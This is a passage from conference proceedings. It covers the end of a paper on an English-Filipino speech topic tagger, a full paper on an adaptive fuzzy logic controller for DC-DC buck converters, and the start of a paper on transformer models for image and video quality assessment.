In the top salient terms of the validation set, the most salient term is ‘mo’ which, in Filipino, is an identifier to the second person in the speaker’s point of view. This is completely sensible as the Filipino Data that the researchers used to train the model was a corpus composed of utterances of daily informal conversations of speakers in Filipino/Tagalog. Continuing the solution for the topic tagger, the predictions of the automatic speech recognition model in the test data that was presented before this section were also used
English-Filipino Speech Topic Tagger
439
to yield topic distributions using Latent Dirichlet Allocation. Figures 7, 8 and 9 show the top salient terms in the fed speech data and top words that the tagger predicts to be useful to infer the topics of the speech data. These top words are the considered output of the speech topic tagger.
Fig. 7. Speech tagger results in “What Do You Want To Be?” by Sabrina Ongkiko in TedxTalks PH
Fig. 8. Speech tagger results in Recreate’s interview video about first love experiences
Fig. 9. Speech tagger results in Recreate’s documentary about anti-terror law
4.4 Evaluation of the Topic Models As noticed in the visualization and results, some of the words were incomprehensible while some of them can be partially considered as Filipino stop words. To evaluate the correctness of the salient topics produced by the topic models or the results of the speech topic tagger, 15 respondents were asked to answer a survey in an observation-based approach. The survey questions have separate sections per input topic. The first instruction was to check all the words that the respondents think were related, regardless of relevance, to the topics talked about in the linked video. If they left some unchecked, select the most probable reason why they decided or considered that the unchecked topics are unrelated. The second instruction was to check all the keywords that they think will be helpful in inferring the topics talked about in the linked video and to select the most probable reason on why they decided or considered that the unchecked topics or words cannot be used for topic inference. For every input data, a total of 30 topics have been shown to the respondents for the first instruction. As for the second instruction, the total of items in the question about
440
J. K. B. Tumpalan and R. N. C. Recario
topic inference is initially 30 but can be decreased due to the duplicates within the top five keywords based on weightage (importance) to each topic from the results of LDA. What Do You Want To Be?|Sabrina Ongkiko (Talk) - Low to No Noise • Majority of the respondents (50%+) agreed that 13 topics out of 30 words from the Top Salient Terms were related. – 23 out of these 30 words were marked as related by about 40% of the total respondents. – The respondents did not check the rest of the 30 words because they were mentioned in the video but were not related enough. • Majority of the respondents answered that 6 out of the 13 top keywords from Fig. 7 for inference were indeed truly useful. The words were: pagpili, kahirapan, buhay, mahirap, tao, desisyon - as seen from Fig. 10. • All of the respondents unchecked some of the items in the top keywords from Fig. 7 because they were mentioned in the video but were not relevant enough to be used for topic inference.
Fig. 10. Useful words from the abstract topics produced from “What Do You Want To Be? – Sabrina Ongkiko (Talk)” based on the respondents
We Asked People about the First Time they fell in Love (Stories & Experiences) Medium Noise • The majority of the respondents (50%+) agreed that only 3 topics out of 30 words from the Top Salient Terms were related. – Only 7 out of these 30 words were marked as related by about 40% of the total respondents.
English-Filipino Speech Topic Tagger
441
– 73.3% of them said that they unchecked the rest of the words because most of them were incomprehensible. • The majority of the respondents answered that 3 out of the 21 top keywords in Fig. 8 for inference were indeed truly useful. The words were: friends, love, and person - as seen from Fig. 11. • 53.3% of the total respondents said that they unchecked the rest of the words because most of them were incomprehensible, while the remaining respondents deemed the words as not relevant enough to be used for topic inference.
Fig. 11. Useful words from the abstract topics produced from “We Asked People about the First Time They Fell in Love (Stories & Experiences)” based on the respondents
What does the Anti-terror Law Even Mean? (Documentary) - High Noise • Majority of the respondents (50%+) agreed that 11 topics out of 30 words from the Top Salient Terms were related. – 15 out of 30 words were marked as related by 40% of the total respondents. – 73.3% of them said that they unchecked the rest of the words because they were not related enough even though they were mentioned, while the remaining 26.7% said that they were incomprehensible. • Majority of the respondents answered that six out of the 19 top keywords in Fig. 9 for inference were indeed truly useful. The words were: batas, power, tairlow, atax, people, and government - as seen from Fig. 12. • 26.7% of the respondents said that they unchecked the rest of the words because most of them were incomprehensible, while the other 73.3% remaining respondents deemed the words as not relevant enough to be used for topic inference.
442
J. K. B. Tumpalan and R. N. C. Recario
Fig. 12. Useful words from the abstract topics produced from “We Asked People about the First Time they fell in Love (Stories & Experiences)” based on the respondents
The next few figures are example images of the interface of the application run using the Google Colab’s interactive Python Notebook. Figure 13 shows each abstract topic for the tested YouTube videos. Each word was printed with their weightage for each abstract topic. Lastly, in Fig. 14 is a wordcloud visualization of the high-frequency words before applying the removal of stop words. The visualized stop words have been caught by the stop words collection used by the researchers, so the words displayed were not tagged as salient and their weights were disregarded by the model in the process of getting the abstract topics.
Fig. 13. App Interface 1 – printed topics with their respective weights
English-Filipino Speech Topic Tagger
443
Fig. 14. App Interface 2 – wordcloud visualization of high-frequency words before stop words removal
5 Conclusion and Future Work The researchers were able to implement speech tagging that transcribes speech data using Speech-to-Text of an ASR and extract context in the output data using Topic Modeling. They were also able to implement modeling techniques to test compatibility of methods in an ASR system for English-Filipino. Lastly, they were able to evaluate the results of Latent Dirichlet Allocation (LDA) on extracting topics in an English-Filipino audio data collection through transcriptions of an English-Filipino ASR Model. The English-Filipino Speech Topic Tagger performed automatic speech topic tagging by producing words that can be used for topic inference. The Tagger has been implemented in two parts. It transcribed speech data to text data using a fine-tuned Automatic Speech Recognition model then extracted context from the text data using Latent Dirichlet Allocation, a generative statistical model. Transfer Learning, using the XLSR-Wav2Vec2 model, and hyperparameter tuning, through varied epochs and learning rate testing, has been implemented to test the compatibility of these methods for an ASR for English-Filipino. Lastly, the effectiveness of Latent Dirichlet Allocation on the speech-to-text output has been evaluated using an observation-based approach. The evaluation confirmed that only some of the keywords produced by the tagger were truly salient, related, and relevant to the input data. The built English-Filipino Speech Topic Tagger still needs a lot of improvements before it can be used by endusers. For it to be considered as a usable and reliable application, the tagger should consistently produce relevant topics and as much as possible only have a low to no chance of tagging irrelevant words not related to the speech topic. It did its work as a speech tagger but due to multiple limitations in creating the ASR model such as data, hardware, and language resources, it does not fully yield semantically accurate topics. The ASR model delivered transcriptions, but it incorrectly produced some phonemes of English as Filipino or vice-versa. This was a conflict between two languages because the English and Filipino parts were separately trained to the base XLSR-Wav2Vec2 model. This was observable in some words with incorrect spelling but in correct syllable or speech representation in one of the two languages. Overall, it yielded excellent results
444
J. K. B. Tumpalan and R. N. C. Recario
for words that were included in the conversational dataset, but it had higher word errors in new input data. As for the Latent Dirichlet Allocation, usual pre-processing techniques like Stemmization or Lemmatization were not applied because not all words present in the document can be considered as proper words and no stemmers or lemmatizers are available for documents in English-Filipino. Despite this, some words in the word-topic distributions representing each topic were still proven to be useful for topic inference. However, the results of evaluation were leaning into the conclusion that a normal LDA implementation is not fit in this two-part solution for the English-Filipino Speech Topic Tagger. Given the above-mentioned points, the study achieved its objectives. Even though resource and accuracy have been a consistent challenge to the study, these conclusions will still be useful for future research endeavors. Future researchers who will extend this work can focus on the speech data. The current community situation did not make it easy for researchers to source daily scripted and conversational data. Additionally, it was hard to source data from more diverse people with different demographic profiles in the current COVID situation. With this, platforms like Mozilla’s Common Voice can be created or utilized for sourcing and delivering a well-structured speech data set for Filipino ASR. With time and resource limitations, the researchers utilized all available and possible open-source resources. For example, The Colab Notebook was used for the models. The current virtual machines allocated to the Colab Notebook can only handle a train and evaluation batch size of eight, despite having premium subscription to the service. This is only a fourth of the usual default batch size, 32, which is a good starting point in making the network compute faster. Additional audio pre-processing can be implemented too like splitting at silences in an adaptive dB level threshold. This will eliminate random noise between sentences or phrases and will affect the training significantly for future models if they plan to use random noisy data sourced online for training.
References 1. Cano, P., Koppenberger, M., Wack, N.: Content-based music audio recommendation, pp. 211– 212, January 2005 2. Souli, S., Lachiri, Z.: Audio sounds classification using scattering features and support vectors machines for medical surveillance. Appl. Acoust. 130, 270–282 (2018) 3. Lasseck, M.: Audio-based bird species identification with deep convolutional neural networks, September 2018 4. Helander, M., Moody, T.S., Joost, M.G.: Chapter 14 - systems design for automated speech recognition. In: Helander, M. (ed.) Handbook of Human-Computer Interaction, NorthHolland, Amsterdam, pp. 301–319 (1988). https://www.sciencedirect.com/science/article/pii/ B9780444705365500191 5. Zajechoswski, M.: Automatic speech recognition (ASR) software - an introduction. Usability Geek (2005). https://usabilitygeek.com/automatic-speech-recognition-asr-software-an-int roduction/ 6. Hernandez, A., Reyes Jr., F., Fajardo, A.: Convolutional neural network for automatic speech recognition of Filipino language. Int. J. Adv. Trends Comput. Sci. Eng. 9, 34–40 (2020) 7. Cai, C., Briones, M.R., Te, E., Pascual, R.: Development of an automatic speech recognizer for Filipino-speaking children, November 2020
English-Filipino Speech Topic Tagger
445
8. Krestel, R., Fankhauser, P., Nejdl, W.: Latent Dirichlet allocation for tag recommendation, pp. 61–68, January 2009 9. Wang, S., Lo, D., Vasilescu, B., Serebrenik, A.: Entagrec ++: an enhanced tag recommendation system for software information sites. Empir. Softw. Eng. 23, 04 (2018) 10. Ramage, D., Hall, D., Nallapati, R., Manning, C.D.: Labeled LDA: a supervised topic model for credit attribution in multi-labeled corpora. In: Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing. Association for Computational Linguistics, Singapore, pp. 248–256, August 2009. https://aclanthology.org/D09-1026 11. Liu, Y., Du, F., Sun, J., Jiang, Y.: iLDA: an interactive latent Dirichlet allocation model to improve topic quality. J. Inf. Sci. 46(1), 23–40 (2020). https://doi.org/10.1177/016555151882 2455 12. Koltcov, S., Nikolenko, S.I., Koltsova, O., Bodrunova, S.: Stable topic modeling for web science: granulated LDA. In: Proceedings of the 8th ACM Conference on Web Science, Ser. WebSci 2016. Association for Computing Machinery, New York, NY, USA, pp. 342–343 (2016). https://doi.org/10.1145/2908131.2908184 13. Conneau, A., Baevski, A., Collobert, R., Mohamed, A., Auli, M.: Unsupervised cross-lingual representation learning for speech recognition. arXiv preprint arXiv:2006.13979 (2020) 14. Rivière, M., Joulin, A., Mazaré, P.-E., Dupoux, E.: Unsupervised pretraining transfers well across languages. arXiv, abs/2002.02848 (2020) 15. Grosman, J.: Xlsr wav2vec2 English by Jonatas Grosman (2021). https://huggingface.co/jon atasgrosman/wav2vec2-large-xlsr-53-english 16. Seyfrath, S., Zhao, P.: Evaluating an automatic speech recognition service. AWS Machine Learning Blog (2020). https://aws.amazon.com/blogs/machine-learning/evaluating-an-aut omatic-speech-recognition-service/
A Novel Adaptive Fuzzy Logic Controller for DC-DC Buck Converters Thuc Kieu-Xuan1 and Duc-Cuong Quach2(B) 1 2
Faculty of Electronic Engineering, Hanoi University of Industry, Hanoi, Vietnam [email protected] Faculty of Electrical Engineering, Hanoi University of Industry, Hanoi, Vietnam [email protected] https://www.haui.edu.vn
Abstract. This paper is concerned with design and implementation of a direct adaptive fuzzy logic controller (DAFLC) to stabilize the output voltage of the DC-DC buck converter under the conditions of input voltage variation, changing of load and uncertainty of system model. The DAFLC is designed with the Takagi and Sugeno’s fuzzy logic system and Lyapunov stability theory to bring out remarkable stability and outstanding transient quality to the DC-DC buck converter. Experimental results shown that the DC-DC buck converter with the proposed DAFLC has effective performance in term of stability and transient quality. Morever, the proposed system does not require any requirement of mathematical model. Keywords: DC-DC buck converter · Takagi and Sugeno’s fuzzy logic system · Adaptive fuzzy logic controller · Direct adaptive fuzzy logic controller
1
Introduction
Traditional linear control algorithms such as PI or PID, had been used to construct DC-DC converters because of its simplicity. However they require exactly mathematical model of the system and bring lack of dynamic behavior to the DC-DC converter. Recently, there has been increasing interest in the development of efficient control algorithms to improve dynamic behaviors of DC-DC converters by using discrete sliding mode controller [1], fuzzy logic controller (FLC) [2], adaptive fuzzy logic controller (AFLC) [3], and neuro-fuzzy controller (NFC) [4]. The fuzzy logic based controllers could be useful in situations where (i) there is no exactly mathematical model for the system and (ii) there are experienced operators who can satisfactorily control the plant and provide qualitative control rules in terms of vague and fuzzy sentences [5,6]. There are many practical situations where both (i) and (ii) are true [7–10]. In this paper, we introduce a systematic approach to construct a direct adaptive fuzzy logic controller (DAFLC) for DC-DC buck converters. A Takagi and c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 446–454, 2023. https://doi.org/10.1007/978-3-031-28073-3_32
Hamiltonian Mechanics
447
Fig. 1. System model of the DC-DC buck converter with DAFLC
Sugeno’s fuzzy logic system with adaptive inference rules is utilized to directly estimate the optimal duty ratio of the DC-DC buck converter’s control signal based on Lyapunov stability theory. Therefore, the DC-DC buck converter can regulate its output voltage without the knowledge of the mathematical model as well as the variation of the input voltage. Experimental results clearly prove that the proposed converter has outstanding performance in term of stability and transient quality. The organization of the paper is as follows: In Sect. 2, the system model is described. The DAFLC is proposed in Sect. 3. The implementation of the proposed control algorithm is given in Sect. 4. Experimental results are presented in Sect. 5. Finally, in Sect. 6, we conclude the paper.
2
System Model
The considered system includes a DC-DC buck converter controlled by a DAFLC as shown in Fig. 1. The system has desired output voltage, denoted by ym , and output voltage on load, denoted by Vo . Based on the output voltage and the error between the output voltage and the desired output voltage, the DAFLC estimates the optimal value of the PWM duty cycle for the IGBT of the DC-DC buck converter to control the output voltage tracking the desired output voltage under the load changing and input voltage varying conditions. The model of DC-DC buck converter, illustrated in Fig. 2, in continuous current mode is demonstrated in Fig. 3 [11–13]. Transfer functions of this converter are determined as below: Vˆo (s) = Vg (s)G0 ˆ d(s)
(1)
GVg (s) =
¯ DR V¯o (s) = G0 Vg (s) rL + R
(2)
Zout (s) =
Vˆi (s) rc R = G1 i(s) rc + R
(3)
GVd (s) =
448
T. Kieu-Xuan and D.-C. Quach
Fig. 2. Diagram of the DC-DC buck converter
Fig. 3. Block diagram of the DC-DC buck converter
¯ + dˆ D=D where G0 =
(4)
rcCs+1 rL RC+L 2 s+1 LC rrc +R +R s + rc C+ r +R L
and G1 =
L
(LCs+rL C)(LCs+L/rc ) +R LCs2 +(rL C+ rcrRC+L )s+ rrLc +R c +R
In which: D, R, rc , C, rL , L and Vg are PWM duty cycle for IGBT, resistance load, capacitor’s resistance, capacitor’s capacitance, inductor’s resistance, inductor’s inductance and input voltage (i.e. supply voltage), respectively. It can be seen easily that system model depends on the capacitor’s resistance rc , inductance L, PWM duty cycle D, load resistance R and even input voltage Vg . From (1), (2), (3), and (4), control object is second-order SISO with input D and output voltage Vo and it can be written as: V¨o = a0 V˙ o + a1 Vo + bD (5) y = Vo In which a0 , a1 and b are unknown positive real numbers: V R rL +R c CR+rL RC+L ; a1 = LC(r ; b = LC(rgc +R) . a0 = rc rL C+r LC(rc +R) c +R)
3
The Proposed DAFLC
For convenient mathematical transforms, let x = [x1 , x2 ]T = [x, x] ˙ T , with x is output voltage Vo of DC-DC buck converter. We can rewrite (5) as follows:
Hamiltonian Mechanics
⎧ ⎨ x˙ 1 = x2 x˙ 2 = f (x) + bu ⎩ y = x1
449
(6)
In which: f (x) = a0 x˙ + a1 x; u = D. The optimal control value is determined as u∗ =
1 1 (x˙ 2 − f (x)) = (¨ x − f (x)) b b
(7)
A Takagi-Sugeno’s fuzzy logic system is utilized to estimate u(x|θ) signal approximately to u∗ with the condition that b is a positive finite number and f (x) is a bounded continuous function [10,11]. The inference rules of the proposed DAFLC are in the following form: 1 : IF x1 is V1 and x2 is dV1 THEN u1,1 = θ1,1 R1,1 2 R1,2 : IF x1 is V1 and x2 is dV2 THEN u1,2 = θ1,2 ... k=i+m(j−1) : IF x1 is Vi and x2 is dVj THEN ui,j = θi,j Ri,j ... l=m×n : IF x1 is Vm and x2 is dVn THEN um,n = θm,n Rm,n In which: Vi (1 ≤ i ≤ m) and dV j (1 ≤ j ≤ n) are fuzzy sets of variables x1 and x2 which are fuzzified by membership functions μxi 1 and μxj 2 , θ is the parameter vector of the fuzzy system. The output value of the fuzzy logic system is obtained as follows: m n x1 x2 i=1 j=1 θi,j μi μj (8) u(x|θ) = m n x1 x2 i=1 j=1 μi μj By denoting the parameter update vector ξ(x) = [ξ1 (x), ξ2 (x), . . . ξm×n (x)] T and θ = [θ1 , θ2 , . . . θm×n ] , in which: θ(i+m×(j−1)) = θi,j ξ(i+m×(j−1)) =
x
T
x
µ 1µ 2 m i n j x1 x2 i=1 j=1 µi µj
The control signal u(x|θ) can be simply calculated as follows: u(x|θ) = θT ξ(x)
(9) T
The system error is defined as e = ym − y, and the error vector is e = [e, e] ˙ . The error differential equation for second order system has the following form e¨ + k1 e˙ + k2 e = 0. The characteristic matrix of the system error can be defined as A = [0 1; −k2 − k1 ]. The parameter vector of the fuzzy system can be adjusted by using the Lyapunov stability criterion as follows [5,6,10]: θ(t) = γ 0
t
eT p2 ξ(x)dt + θ(0)
(10)
450
T. Kieu-Xuan and D.-C. Quach Table 1. System configuration
No Parameter
Value
Normalized value Normalized function
[0, 400] V
[0, 4000]
1
Output x1
2
Derivative of output x2 [−20000, 20000] V/s [−20, 20]
3
Control value u
[0, 1]
[0, 200]; µxi 1 [−20, 20]; µxj 2
[−2047, 2047]
Fig. 4. Fuzzy sets of output voltage and derivative of the output voltage
In which γ is a positive update coefficient, p2 is the last column of the matrix P2×2 satisfying the following Lyapunov equation: AT P + PA = −Q,
(11)
where Q is a positive symmetric matrix.
4
Implementation of the DAFLC Using ARM Embedded Platform
In this section, we present briefly about setting up the proposed DAFLC on the STM32F407VGT6 microcontroller from ST Microelectronics [14]. 4.1
Fuzzification and Defuzzification
The Takagi-Sugeno fuzzy system based DAFLC includes two inputs which are the output voltage, denoted by x1 , and the derivative of the output voltage, denoted by x2 . These input variables are fuzzified by five isosecles triangle fuzzy sets as shown in Fig. 4. System parameters are normalized as shown in Table 1. From (9), the defuzzified value at the k −th sampling time can be determined as follows: (12) u(x(k)|θ(k)) = θT (k)ξ(x(k)) 4.2
Inference Rule Update
From (10), fuzzy inference rule will be updated by adjusting the parameter vector based on the following discrete equation [9,10]: Δθl (k) = γeT (k)p2 ξl (x(k)) (13) θl (k + 1) = θl (k) + Δθl (k) + θl (0)
Hamiltonian Mechanics
451
Fig. 5. Operation algorithm of the DAFLC and experimental system x1 x (k)µ 2 (k)
µ
where, ξl (x(k)) = 5 i 5 µxj1 (k)µx2 (k) ; l = i + 5(j − 1); θl (0) = 0, ∀l = i=1 j=1 i j 1, 2 . . . m × n. In experiment process, the DAFLC parameters are set up as follows: γ = 5; Characteristic equation of error is selected as e¨ + 10e˙ + 50e = 0 so A = [0, 1; −50, −10]; Q = [100, 0; 0, 150]; from equation (11) we have T P = [390, 1; 1, 7.6], so p2 = [1, 7.6] . The control algorithm of DAFLC and experiment model is shown in Fig. 5.
5
Experimental Results
Experimental system is shown in Fig. 5. The input voltage of the system is supplied from 1-phase 220 V/50 Hz AC power source through a bridge rectifier with a 1.000 µF/450 V filtering capacitor. Load current, input voltage, output voltage and reference voltage are independently measured by NI-USB 6009 data acquisition card and monitored on PC by Simulink software. 5.1
Case 1: Experiment with Reference Voltage Value 200 V, Constant Load R = 50 Ω
As shown in Fig. 6, although supply source Vg has relatively strong ripples, the system response tracks reference value ym with a mean accuracy of 1.5%. Additionally, the dynamic quality of the system is outstanding with a transient time
452
T. Kieu-Xuan and D.-C. Quach
Fig. 6. Responses of the system in case 1
Fig. 7. Responses of the systems in case 2
of 0.06 s and a maximum overshoot of 10%. These results prove the good control ability of the DAFLC under the changing of model parameters. 5.2
Case 2: Experiments with Rising Steeply Reference Voltage Values from 50 V to 200 V, and the Load Resistance is Fixed at 50 Ω
Experiment results depicted in Fig. 7 show that: i) Voltage Vo is stable and quickly tracks the reference value ym ; ii) Steady-state error ess of the system is very small, the minimum ess is 1% and the maximum ess is only 1.5%.
Hamiltonian Mechanics
453
Fig. 8. Responses of the systems in case 3 Table 2. Experimental results in case 3
No Time
Testing condition
Voltage V0
1
[0, 0.2] s
R = 50 Ω, Vg = 310 V, ym = 100 V
100 V, ess = 0.5% 2.00 A
2
[0.2, 0.4] s R = 25 Ω, Vg = 310 V, ym = 100 V
100 V, ess = 1.5% 4.00 A
3
[0.4, 0.5] s R = 16.7 Ω, Vg = 310 V, ym = 100 V 100 V, ess = 2.0% 6.00 A
4
[0.5, 0.9] s R = 16.7 Ω, Vg = 310 V, ym = 50 V
5
[0.9, 1.2] s R = 16.7 Ω, Vg = 310 V, ym = 150 V 150 V, ess = 2.5% 8.98 A
5.3
50 V, ess = 1.5%
Current I
3.00 A
Case 3: Experiment with Varying Load and Input Voltage
Experimental results in Case 3 are shown in Table 2, and depicted in Fig. 8. From Table 2 and Fig. 8, it can be seen that: i) Transient response of the system is very good. The y(t) can closely follows ym (t) under the variation of load and supply voltage Vg (t) conditions. When voltage y(t) decreases (t = 0.5 s), setting time is longer and maximum overshoot is higher because of the inertial nature of the DC-DC buck converter. Especially at low load and high voltage, this problem is going to get worse. This effect is small if the capacitor’ capacitance is small and the load is high. ii) When resistance R load changes, response Vo of the system tracks the reference signal ym (t). The system is stable according to Lyapunov stability theory. iii) The steady state error in the control system is in the range of [0.5, 2.5]%, as shown in Table 2. Practically, we can use the rectifier filter capacitor with larger capacitance to obtain a better steady state error.
454
6
T. Kieu-Xuan and D.-C. Quach
Conclusions
In this paper, a direct adaptive fuzzy logic controller for DC-DC buck converters has proposed and implemented on a ARM Cortex M4-based platform. The DAFLC is able to regulate the output voltage of DC-DC buck converter under the variation of load as well as input voltage. Experiments results have demonstrated effectiveness of proposed controller and showed satisfactory results without any requirement of human expert as well as the exact mathematical model of the system. This research was partially supported by Hanoi University of Industry under research project coded 26-2020-RD/HD-DHCN.
References 1. Dehri, K., Bouchama, Z., Nouri, A.S., Essounbouli, N.: Input-output discrete integral sliding mode controller for DC-DC buck converter. In: Proceedings of the 15th International Multi-Conference on Systems Signals and Devices, Yasmine Hammamet, Tunisia, 19-22 March 2018, pp. 100–123 (2018) 2. Ilka, R., Gholamian, S.A., Rezaie, B., Rezaie, A.: Fuzzy control design for a DCDC buck converter based on recursive least square algorithm. Int. J. Comput. Sci. Appl. (IJCSA) 2(6) (2012) 3. Elmas, C., Deperlioglu, O., Sayan, H.H.: Adaptive fuzzy logic controller for DC-DC converters. Expert Syst. Appl. 36(2P1), 1540–1548 (2009) 4. Emami, S.A., Poudeh, M. B., Eshtehardiha, S., Moradiyan, M.: An adaptive neurofuzzy controller for DC-DC converter. In Proceedings of the International Conference on Control, Automation and Systems, Seoul, Korea (2008) 5. Wang, L.X: A Course in Fuzzy Systems and Control. Prentice-Hall International Inc. (1996) 6. Wang, L.X.: Stable adaptive fuzzy control of nonlinear systems. IEEE Trans. Fuzzy Syst. 1(2), 146–155 (1993) 7. Bellomo, D., Naso, D., Babuska, R.: Adaptive fuzzy control of a non-linear servodrive Theory and experimental results. Eng. Appl. Artif. Intell. 21, 846–857 (2008) 8. Labiod, S., Guerra, T.M.: Adaptive fuzzy control of a class of SISO nonaffine nonlinear systems. Fuzzy Sets Syst. 158, 1126–1137 (2007) 9. Ougli, A.E., Lagrat, I., Boumhidi I.: Direct adaptive fuzzy control of nonlinear systems. ICGST-ACSE J. 8(II) (2008). ISSN 1687-4811 10. Quach, D.-C., Huang, S., Yin, Q., Zhou, C.: An improved direct adaptive fuzzy controller for an uncertain DC motor speed control system. TELKOMNIKA Indon. J. Electr. Eng. 11(2), 1083–1092 (2013) 11. Zhang, N., Li, D.: Loop response considerations in peak current mode buck converter design. TI technical report, SLVAE09A, Revised 2021 (2018) 12. Vishnu, D.: Modelling an adaptive control of a DC-DC Buck converter. Master thesis, Department of Electrical Engineering, National Institute of Technology, Rourkela (2015) 13. Yang, R.: Modeling and control for a current-mode buck converter with a secondary LC filter. Analog Dialogue 52(10) (2018) 14. The datasheet of STM32F4xx Microcontroller. https://www.st.com/resource/en/ datasheet/dm00037051.pdf
Visual Mechanisms Inspired Efficient Transformers for Image and Video Quality Assessment Junyong You1(B) and Zheng Zhang2 1 NORCE Norwegian Research Centre, Bergen, Norway
[email protected]
2 Hong Kong University of Science and Technology, Hong Kong, China
[email protected]
Abstract. Visual (image, video) quality assessments can be modelled by visual features in different domains, e.g., spatial, frequency, and temporal domains. Perceptual mechanism in the human visual system (HVS) play a crucial role in the generation of quality perception. This paper proposes a general framework for noreference visual quality assessment using efficient windowed transformer architectures. A lightweight module for multi-stage channel attention is integrated into the Swin (shifted window) Transformer. Such module can represent appropriate perceptual mechanisms in image quality assessment (IQA) to build an accurate IQA model. Meanwhile, representative features for image quality perception in the spatial and frequency domains can also be derived from the IQA model, which are then fed into another windowed transformer architecture for video quality assessment (VQA). The VQA model efficiently reuses attention information across local windows to tackle the issue of expensive time and memory complexities of original transformer. Experimental results on both large-scale IQA and VQA databases demonstrate that the proposed quality assessment models outperform other state-of-the-art models by large margins. Keywords: Image quality assessment · No-reference visual quality assessment · Transformer · Video quality assessment · Visual mechanisms
1 Introduction With the rapid development of mobile devices and social media platforms, e.g., TikTok, Instagram, we have seen an explosion of user-generated content (UGC) visual contents (images, videos). Evaluation of the perceived quality of UGC images/videos becomes a critical issue. Traditionally fully developed methods for visual quality assessment have been focused on full-reference or reduced-reference scenario, in which a distorted visual signal is assessed by fully or partially compared with the original undistorted signal [1]. However, no reference information for UGC image/video is available, as the distortions are often introduced by unprofessional producing methods, poor capturing environments and equipment, or other authentic artifacts. Thus, no-reference (NR) quality assessment naturally becomes the only choice for UGC quality assessment. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 455–473, 2023. https://doi.org/10.1007/978-3-031-28073-3_33
456
J. You and Z. Zhang
Early studies on NR image quality assessment (IQA) or video quality assessment (VQA) often targeted at certain distortion types, e.g., compression and transmission artefacts [2, 3]. Later, in order to build a general-purpose quality assessment model, feature engineering was widely used [4] [5]. Representative features relevant to quality perception are derived from visual signals in different domains, e.g., spatial, frequency and temporal domains. The features are then combined into quality prediction using either analytic approaches, or machine learning methods, or both. In [4], a widely referenced IQA model (BRISQUE) derives scene statistics of locally normalized luminance coefficients in the spatial domain, based on which support vector regressor (SVR) is used to predict an image quality score. Saad et al. [5] employed an analytic model (VBLIINDS) based on intrinsic statistical regularities mimicking distortions occurred on natural videos in VQA. To efficiently reduce complexity of processing long video sequences, Korhonen [6] proposed to model quality related video features on two levels: low complexity features on full video and high complexity features on representative frames only. The features are then fed into SVR for quality evaluation. As deep learning is dominating computer vision tasks, it has also attracted research interests in image/video quality assessment. Earlier works on deep IQA models often follow the approach in image classification, e.g., adapting the CNN classification models for quality prediction. In [7], AlexNet pretrained on ImageNet is fine-tuned and used to extract image features for IQA. Hosu et al. [8] added several fully connected layers on the top of InceptionResNetV2 to develop an IQA model, which shows promising performance on their developed dataset KonIQ-10k. However, a potential issue with direct adaption of classification models for IQA lies in that image rescaling is required, as those classification models often accept fixed input sizes. Such image rescaling might not significantly affect the classification task, while it can have dramatic influence on perceived image quality. For example, viewers often prefer to watch high-dimension visual contents on large screens than low-resolution signals on small screens. Thus, image rescaling should be avoided in IQA models to prevent from introducing extra unnecessary distortions. On the other hand, as a subjective concept, visual quality perception can be essentially determined by the intrinsic mechanisms in human visual system (HVS). For example, selective spatial attention can guide the quality assessment process. Viewers might pay different attention to different visual stimuli driven by the contents, viewing tasks and other factors in an overt or covert manner [9, 10]. In addition, contrast sensitivity function (CSF) describes that the HVS presents different sensitivities to individual components in the visual stimuli [11, 12]. It also affects quality perception as certain distortions do not trigger viewers’ perception, e.g., a just noticeable distortion model is inspired by CSF [13]. As the transformer model can appropriately represent the selective attention mechanism, it has been applied in IQA. You et al. [14] proposed a hybrid model (TRIQ) using a transformer encoder based on features derived from a CNN backbone. Furthermore, considering that both high-resolution and low-resolution features contain essential information for image quality perception, several models have been developed based on a multi-scale architecture. Ke et al. [15] proposed a multi-scale image quality transformer (MUSIQ) based on 3D spatial embedding and scale embedding at different granularities. In [16], a hierarchical module simulating spatial and channel
Visual Mechanisms Inspired Efficient Transformers
457
attention is integrated into CNN backbone for multi-scale quality prediction. Wu et al. [17] proposed a cascaded architecture (CaHDC) to represent the hierarchical perception mechanism in HVS, and then pool the features extracted at different scales. In [18], a hyper network (hyperIQA) is built by aggregating multi-scale image features capturing both local and global distortions in a self-adaptive manner. Compared to applying deep networks for IQA, VQA still does not widely benefit from the advances of deep learning models, due to the complexity and diversity of modelling spatial-temporal video characteristics. It is difficult to directly feed a long video sequence into deep networks consuming tremendous computing resources. For example, a rough estimation indicates that ResNet50-3D on 10s video (1024x768 @25FPS) requires ~ 14GB memory. Existing deep learning driven video models, e.g., for video classification, mainly perform frame down-scaling on short sequences to reduce the resource requirements [19]. Considering that image rescaling should be avoided in visual quality assessment, a feasible approach is to derive quality features from video frames first and then pool them in the temporal domain. This is actually a mainstream work in VQA [20–24]. For example, pretrained CNNs are often used to derive frame features and popular recurrent neural networks (RNN) or regressors are employed for temporal pooling, e.g., LSTM [20, 21], GRU [22], 3D-CNN [23], and SVR [24]. However, those large-scale image datasets to pretrain CNNs were built for other purposes than quality assessment. Image features derived by the pretrained CNNs might not well represent quality related properties. Several studies intend to derive frame features by dedicated IQA models instead of pretrained CNNs, e.g., see [25, 26]. Furthermore, as both spatial and temporal video characteristics contribute to video quality, quality features derived in the two domains have also been considered simultaneously in VQA models [27, 28]. As a powerful presentation tool, transformer has already demonstrated outstanding performance in time-series data analysis, e.g., language modelling [29. 30]. Naturally, it should also be considered in VQA as a temporal pooling approach. You et al. [25] has proposed a long short-term convolutional transformer for VQA. In [31], video frames are first preprocessed (spatial and temporal down-samplings) and then fed into a transformer with sequential time and space attention blocks. Whereas, besides its excellent representation capability, transformer has an unignorable problem of quadratic time and memory complexity. Recently, several attempts have been made to develop efficient transformer models in computer vision and time-series data process. For example, the dot-product was replaced by locality-sensitivity hashing in Reformer to reduce the complexity [32]. Several efficient transformer models attempt to replace the full range attention modelling, as it significantly contributes to the high complexity of original Transformer. Zhu et al. [33] proposed a long-short Transformer by aggregating a long-range attention with dynamic projection for distant correlations and a short-term attention for fine-grained local correlations. Liu et al. [34] used a shifted windowing (Swin) scheme to decompose the full range attention into non-overlapping local windows while also connecting those crossing windows, reducing the complexity of transformer to linear. In this work, we intend to propose a general, efficient framework for no-reference image and video quality assessment. Existing attention based IQA models mainly take
458
J. You and Z. Zhang
